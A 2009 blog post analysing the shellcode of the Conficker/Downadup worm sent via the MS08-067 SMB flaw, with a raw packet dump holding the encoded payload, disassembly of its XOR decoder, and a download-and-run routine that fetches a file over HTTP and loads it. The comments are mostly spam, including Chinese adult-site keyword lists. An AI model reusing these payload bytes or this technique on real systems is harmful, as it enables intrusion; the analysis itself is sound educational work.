Sunday, February 01, 2009

Shellcode (x73 x68 x65 x6C x6C x63 x6F x64 x65)

Shellcode is fun to analyze and it is interesting to see what attackers throw into the mix to make finding the payload harder. Recently I was taking a look at the conficker/downadup shellcode that is used in conjunction with the MS08-067 vulnerability. First we start with the packet data

17:18:12.869891 IP (tos 0x0, ttl 128, id 164, offset 0, flags [DF], proto: TCP (

6), length: 832) 192.168.248.128.1048 > 192.168.248.1.445: P, cksum 0x41fa (corr

ect), 1136:1928(792) ack 927 win 63314

0x0000: 4500 0340 00a4 4000 8006 8540 c0a8 f880 E..@..@....@....

0x0010: c0a8 f801 0418 01bd 836c c50d d4ef d3fb .........l......

0x0020: 5018 f752 41fa 0000 0000 0314 ff53 4d42 P..RA........SMB

0x0030: 2500 0000 0018 07c8 0000 0000 0000 0000 %...............

0x0040: 0000 0000 0008 4004 0008 8000 1000 00c0 ......@.........

0x0050: 0200 0000 0400 0000 0000 0000 0000 0000 ................

0x0060: 0054 00c0 0254 0002 0026 0000 40d1 0200 .T...T...&..@...

0x0070: 5c00 5000 4900 5000 4500 5c00 0000 0000 \.P.I.P.E.\.....

0x0080: 0500 0003 1000 0000 c002 0000 0100 0000 ................

0x0090: a802 0000 0000 1f00 2c15 ce00 0600 0000 ........,.......

0x00a0: 0000 0000 0600 0000 4800 4800 4400 4800 ........H.H.D.H.

0x00b0: 4800 0000 3101 0000 0000 0000 3101 0000 H...1.......1...

0x00c0: 5c00 7074 7a55 6751 515a 624b 7854 6374 \.ptzUgQQZbKxTct

0x00d0: 474d 5046 426f 6e4c 4655 7271 4343 6d44 GMPFBonLFUrqCCmD

0x00e0: 624a 544b 4e79 6749 4770 4e45 5246 7756 bJTKNygIGpNERFwV

0x00f0: 5878 416a 4266 6242 5554 716a 5143 4e74 XxAjBfbBUTqjQCNt

0x0100: 5a65 4f73 4b79 5847 7a58 7448 6641 7276 ZeOsKyXGzXtHfArv

0x0110: 4572 615a 786b 627a 5868 5974 4459 7245 EraZxkbzXhYtDYrE

0x0120: 7961 6e48 676d e8ff ffff ffc1 5e8d 4e10 yanHgm......^.N. <-Shellcode Start

0x0130: 8031 c441 6681 3945 5075 f5ae c69d a04f .1.Af.9EPu.....O

0x0140: 85ea 4f84 c84f 84d8 4fc4 4f9c cc49 7258 ..O..O..O.O..IrX

0x0150: c4c4 c42c edc4 c4c4 9426 3c4f 3892 3bd3 ...,.....&

0x0160: 5747 02c3 2cdc c4c4 c4f7 1696 964f 08a2 WG..,........O..

0x0170: 03c5 bcea 953b b3c0 9696 9592 963b f33b .....;.......;.;

0x0180: 2469 9592 514f 8ff8 4f88 cfbc c70f f732 $i..QO..O......2

0x0190: 49d0 77c7 95e4 4fd6 c717 f704 0504 c3f6 I.w...O.........

0x01a0: c686 44fe c4b1 31ff 01b0 c282 ffb5 dcb6 ..D...1.........

0x01b0: 1b4f 95e0 c717 cb73 d0b6 4f85 d8c7 074f .O.....s..O....O

0x01c0: c054 c707 9a9d 07a4 664e b2e2 4468 0cb1 .T......fN..Dh..

0x01d0: b6a8 a9ab aac4 5de7 991d acb0 b0b4 feeb ......].........

0x01e0: ebf5 fdf6 eaf5 f2fc eaf6 f0fc eaf5 f6fc ................

0x01f0: fefc f5f5 fdeb a6a1 a7a1 b6c4 4550 7257 ............EPrW

0x0200: 786f 5741 7659 4161 6e78 7650 7842 666e xoWAvYAanxvPxBfn

0x0210: 5541 4d57 7267 4e6a 7077 6650 6f48 587a UAMWrgNjpwfPoHXz

0x0220: 6567 6868 7854 6949 4564 774a 5369 764f eghhxTiIEdwJSivO

0x0230: 6352 505a 4d75 7946 7771 6245 694b 777a cRPZMuyFwqbEiKwz

0x0240: 5972 4768 7046 6d4e 6a6d 5371 4264 4c57 YrGhpFmNjmSqBdLW

0x0250: 6e4d 4b64 6544 434d 696e 4c6c 4e79 7342 nMKdeDCMinLlNysB

0x0260: 456b 6272 6c6b 7163 437a 5854 6e55 4f5a EkbrlkqcCzXTnUOZ

0x0270: 4256 4c69 5547 686b 6166 6242 5961 554b BVLiUGhkafbBYaUK

0x0280: 506e 4165 6849 5749 4e61 4f75 6f77 7947 PnAehIWINaOuowyG

0x0290: 7857 6f63 436d 714b 5651 426a 636d 586d xWocCmqKVQBjcmXm

0x02a0: 5453 5063 546c 4242 4d4a 654e 7058 5757 TSPcTlBBMJeNpXWW

0x02b0: 617a 5257 6772 5c00 2e00 2e00 5c00 2e00 azRWgr\.....\...

0x02c0: 2e00 5c00 4100 5400 4f00 5a00 4d00 5500 ..\.A.T.O.Z.M.U.

0x02d0: 4500 0804 0200 e216 896f 454f 575a 27f7 E........oEOWZ'.

0x02e0: 886f 4958 484a 524f 5843 5842 5957 5a58 .oIXHJROXCXBYWZX

0x02f0: 4f4e 4c4b 524f 5046 4746 424c 5256 5143 ONLKROPFGFBLRVQC

0x0300: 5752 4f51 554a 544e 4659 474a 924a 24b6 WROQUJTNFYGJ.J$.

0x0310: 9703 f537 eb62 5159 5743 5357 4a42 4b50 ...7.bQYWCSWJBKP

0x0320: 0000 7700 1f03 0000 0200 0000 0000 0000 ..w.............

0x0330: 0200 0000 5c00 0000 0101 0000 0000 0000 ....\...........

This is the server service packet with the path that contains the overflow and shellcode:

Finding the beginning of the shellcode can at times be a bit tricky. We know it is in here, but there is no clear beginning. The first thing I look for is a 0xEB followed by a small value i.e. a short “Jump” instruction. Here, there is no clear sign, and tracing all instances of 0xEB in IDA Pro does not yield any valid code. The thing that caught my eye was in the middle at offset 0x0134 a 0xE8 0xFF etc… This looks like a “Call” instruction to a previous address. We’ll start here.

Attempting to disassemble at 0x0134 yeilds:

seg000:00000134 loc_134: ; CODE XREF: seg000:loc_134p

seg000:00000134 call near ptr loc_134+4

seg000:00000139 rcr dword ptr [esi-73h], 4Eh

seg000:0000013D adc [eax+6641C431h], al

seg000:00000143 cmp dword ptr [ecx], 0F5755045h

seg000:00000149 scasb

seg000:0000014A mov byte ptr [ebp-157AB060h], 4Fh ; 'O'

seg000:00000151 test cl, al

seg000:00000153 dec edi

seg000:00000154 test bl, al

seg000:00000156 dec edi

seg000:00000157 les ecx, [edi-64h]

seg000:0000015A int 3 ; Trap to Debugger

seg000:0000015B dec ecx

seg000:0000015C jb short loc_1B6

The first call is a call to an address in itself? This is strange?

call near ptr loc_134+4

This calls 0x0138, and the next instruction is at 0x139? Let’s right click and undefined and start at 0x138:

seg000:00000138 inc ecx

seg000:0000013A pop esi

seg000:0000013B lea ecx, [esi+10h]

seg000:0000013E

seg000:0000013E loc_13E: ; CODE XREF: seg000:00000147j

seg000:0000013E xor byte ptr [ecx], 0C4h

seg000:00000141 inc ecx

seg000:00000142 cmp word ptr [ecx], 5045h

seg000:00000147 jnz short loc_13E

seg000:00000149 scasb

seg000:0000014A mov byte ptr [ebp-157AB060h], 4Fh ; 'O'

seg000:00000151 test cl, al

seg000:00000153 dec edi

seg000:00000154 test bl, al

seg000:00000156 dec edi

seg000:00000157 les ecx, [edi-64h]

seg000:0000015A int 3 ; Trap to Debugger

This is a bit better, so the call into itself at 0x138 executes an “inc ecx” which is inconsequential. The current address on the stack is popped into ESI and the address + 0x10 is loaded into ECX and passed to an XOR loop starting at 0x13E. (Highlighted) This routine will XOR each byte starting at 0x149 until a (0x45 0x50) is located, then the loop will exit. Let’s see what happens when the rest of this code is XOR’d:

seg000:0000013E loc_13E: ; CODE XREF: seg000:00000147j

seg000:0000013E xor byte ptr [ecx], 0C4h

seg000:00000141 inc ecx

seg000:00000142 cmp word ptr [ecx], 5045h

seg000:00000147 jnz short loc_13E

seg000:00000149 push 2

seg000:0000014B pop ecx

seg000:0000014C mov eax, fs:[ecx+2Eh] ; fs:[30]

seg000:00000150 mov eax, [eax+0Ch]

seg000:00000153 mov eax, [eax+1Ch]

seg000:00000156 mov eax, [eax]

seg000:00000158 mov ebx, [eax+8]

seg000:0000015B lea esi, [esi+9Ch] ; 1d5

The new code, looks much cleaner now, and it is clear that it is now looking up the base address of kernel32.dll in the PEB at 0x14C {fs:[30]}.

If we look further down where the match for the 0x45 0x50 stopped the XOR loop we see the name of a module to be loaded, a URL and several chunks of data that are hashes used to look up API calls.

Commented disassembly:

seg000:000001D5 dd 768AA260h ; ExitThread

seg000:000001D9 dd 0C8AC8026h ; LoadLibrary

seg000:000001DD aUrlmon db 'urlmon'

seg000:000001E3 db 0

seg000:000001E4 dd 0D95D2399h ; URLDownloadToFileA

seg000:000001E8 aHttp192_168_24 db 'http://{infectedIP}:8119/becer'

seg000:00000209 db 0

seg000:0000020A db 45h

seg000:0000020B db 50h ; P <-End of XOR loop

Once these hashes are matched to the exported API calls in kernel32 and urlmon, the shellcode then passes the deofuscated URL to URLDownloadToFile() via a jump.

seg000:00000172 call HashLookup

seg000:00000177 xor edx, edx

seg000:00000179 push edx ; 0

seg000:0000017A push edx

seg000:0000017B mov ecx, esp

seg000:0000017D mov word ptr [ecx], '.x'

seg000:00000182 push ecx ; "x." for LoadLibrary

seg000:00000183 push dword ptr [edi+4]

seg000:00000186 push edx ; lpfnCB = 0

seg000:00000187 push edx ; dwReserved = 0

seg000:00000188 push ecx ; szFileName = "x."

seg000:00000189 push esi ; szURL 1e8

seg000:0000018A push edx ; pCaller = 0

seg000:0000018B push dword ptr [edi] ; Return Address LoadLibrary

seg000:0000018D jmp eax ; URLDownloadToFile

-- = URLDownloadToFile instructions

-- = LoadLibrary instructions

The interesting thing here is that before the jump to “URLDownloadToFile” the return address for LoadLibrary is pushed to the stack. This means that after the file “becer” is downloaded from the infected machine and copied into the file “x.” it will return to LoadLibrary which will load the file “x.” into the exploited process thus infecting the system.

All in all this is a simple example of how shellcode gets its job done. This instance was interesting in that it has a few tricks and interesting turns that an analyst can learn from.

37 comments:

美利 said...

謝謝分享好文章........................................

日日夜夜 said...

成人色情圖片激情聊天室火辣美眉520sex赤裸美女成人自拍貼圖18限性影片觀賞av色情影音聊天手淫激情成人聊天室成人色情圖片網sex520自拍走光照片淫慾18禁成人影音聊天美女台灣性網限制級女生手淫成人聊天春宮裙底風光情趣丁字褲極度震撼情色論壇露點成人視訊聊天avlive show愛愛明星露點台灣色情網站自慰少婦成人聊天網美女視訊成人頻道人妻熟女蕩婦一對多激情成人色情聊天室av成人上空秀巨奶視訊網愛聊天室一夜正妹色情貼片一對多免費美女視訊粉紅乳頭作愛影片美女聊天sexy成人色情圖片網女人胸部圖片視訊色情情色網站性關係辣妹聊天室大奶子

春天來嚕 said...

TAHNKS FOR YOUR SHARING~~~VERY NICE ........................................

上興上興 said...

thank you for you to make me learn more,thank you∩0∩

子豪 said...

視訊援交露點爆乳潮吹裸體裸照裸女愛愛無碼尋夢視訊聊天a漫a片a圖一夜情一葉情人妻激情情色寫真美女自拍辣妹自拍正妹自拍美女走光辣妹走光正妹走光脫衣秀脫衣走光色情自慰自拍成人全裸打炮

睿玄 said...

路過--你好嗎..很棒的BLOG.........................................

GeraldF_Rotter雅慧 said...

Unable to give you a heart. so have a reply to push up your post. ........................................

凱倩 said...

85cc片觀看,77美女dvd影片,熊貓貼區,ut網際聊天,一葉情,av,嘟嘟,影音live秀,a片,做愛影片,視訊做愛,美女短片,78論壇,ut聊天,打飛機,a片,免費視訊,免費視訊,成人影院,性愛小說,辣妹視訊,網路交友,捷克論壇,h影片,色咪咪,免費影片85cc,kiss911,後宮,a片,影音視訊聊天,交友,免費聊天,聊天室交友,做愛影片,線上a片,美女影片,免費影片下載,免費聊天室,視訊做愛,美女視訊聊天

辰原 said...

cool blog,期待更新........................................

萬宇 said...

鴛鴦吧成人影片免費av成人電影線上免費成人網gogo成人影片a成人短片歐美性愛免費片歐美性愛網歐美性愛寫真歐美情色區歐美情色影片放映區歐美模特兒貼圖歐美模特兒圖歐美線上色情片歐美線上電影歐美線上論壇歐美整外潮吹影片免費看線上下載無碼遙瑤熊貓列表熊貓貼圖站熊貓貼圖區區熊貓貼?熊貓圖片網熊貓圖貼區熊貓影片瘋情網路色情電影網路色情電影觀賞網路看片小遊戲下載區視訊美女館情色a片美女遊戲

NealVassall水慧 said...

faith will move mountains. ..................................................

M212aeganT_Moe1 said...

你的選擇就是做或不做,不做就永遠不會有機會.............................................

佐漢 said...

sex貼片,姦淫小說 高雄視訊34C援交妹AIO 成人視訊jeyn 美女交友豆豆情色視訊 情色文學成人小說,情趣 av博物館 網愛交友qk176 一葉晴語音聊天網av127 hi5 tv 免費影片 173視訊聊天 777成人 硬弟弟論壇 影音交友616 聊天室13060免費 104廖家儀自拍外流 24h免費成人頻道 0204movie免費影片 s18x色網 辣妹影片直播av無碼 aio交友愛情館視訊交友90739 台北聊天交友 援助交際聊天室 嗆辣妹影音視訊聊天室 做愛影片 洪爺影城 辣妹自拍哈尼視訊 台南援交友留言 情惑用品性易購 哈尼視訊,鹹濕視訊 0401遊戲線上 sex女優王國自拍 qq 視訊交友 美女交友影音視訊聊天室 辣妹視訊網 無碼卡通,無碼a片 104自拍 部落格 遊戲區 免費視訊-美女館 34c辣妹影片直播 豆豆情色風暴視訊 給我棒棒 sexy girl,mm視訊kk視訊 85cc辣妹視訊 台灣妹色網 dudu嘟嘟成人網 成人圖片 77p2p影片區 無碼 av影片 視訊聊天 影片 寫真 080台灣名模討論區 視訊網愛聊天室 正妹牆qk176

文佩齊華 said...

你不能改變容貌~~但你可以展現笑容..................................................

麗娟麗娟 said...

Some people cannot see the wood for the trees. ............................................................

王周宏儒 said...

blog的用心,看得出來~~請加油..................................................

玫友 said...

向著星球長驅直進的人,反比踟躕在峽路上的人,更容易達到目的。..................................................................

姵潔 said...

Where did you purchase this product?.............................................................

陳隆 said...

人因夢想而偉大,要堅持自己的理想哦......................................................................

法宇 said...

在莫非定律中有項笨蛋定律:「一個組織中的笨蛋,恆大於等於三分之二。」......................................................................

柏辰柏辰 said...

成熟,就是有能力適應生活中的模糊。.................................................................

宥妃宥妃 said...

當一個人內心能容納兩樣相互衝突的東西,這個人便開始變得有價值了。............................................................

陳登陽 said...

人有兩眼一舌,是為了觀察倍於說話的緣故。............................................................

江冠彭珮李佳宏陽筠 said...

Offence is the best defence.............................................................

竹青 said...

沒有經過反省的人生,是不值得活的人生..................................................

RodrigoR_倪 said...

謝謝格主的分享..................................................................

姿柯瑩柯dgdd憶曾g智曾 said...

一時的錯誤不算什麼,錯而不改才是一生中永遠且最大的錯誤............................................................

王美妹 said...

好東西要和好朋友分享--感謝您............................................................

宮惠如宮惠如 said...

感謝分享,將本身的錯誤想法改正了!............................................................

林志莊麗芬易 said...

hi!~~leave you a message to say hello, and thanks for your share!..................................................................

珮鄧韋 said...

愛情是盲目的,但婚姻恢復了它的視力。......................................................................

仲惠娟惠娟亨 said...

Lets cross the bridge when we come to it............................................................

思張張亦 said...

一個人的價值,應該看他貢獻了什麼,而不是他取得了什麼.................................................................

怡楊雯 said...

人生是故事的創造與遺忘。............................................................

瑞陳彥 said...

^^ 謝謝你的分享,祝你生活永遠多彩多姿!............................................................

48684 said...

活是一種鍛鍊靈魂的東西..................................................................

鲁涵淞 said...

日本正妹 正妹牆強力版 正妹實驗室 制服正妹 正妹寫真館 網路正妹電視台 夜店正妹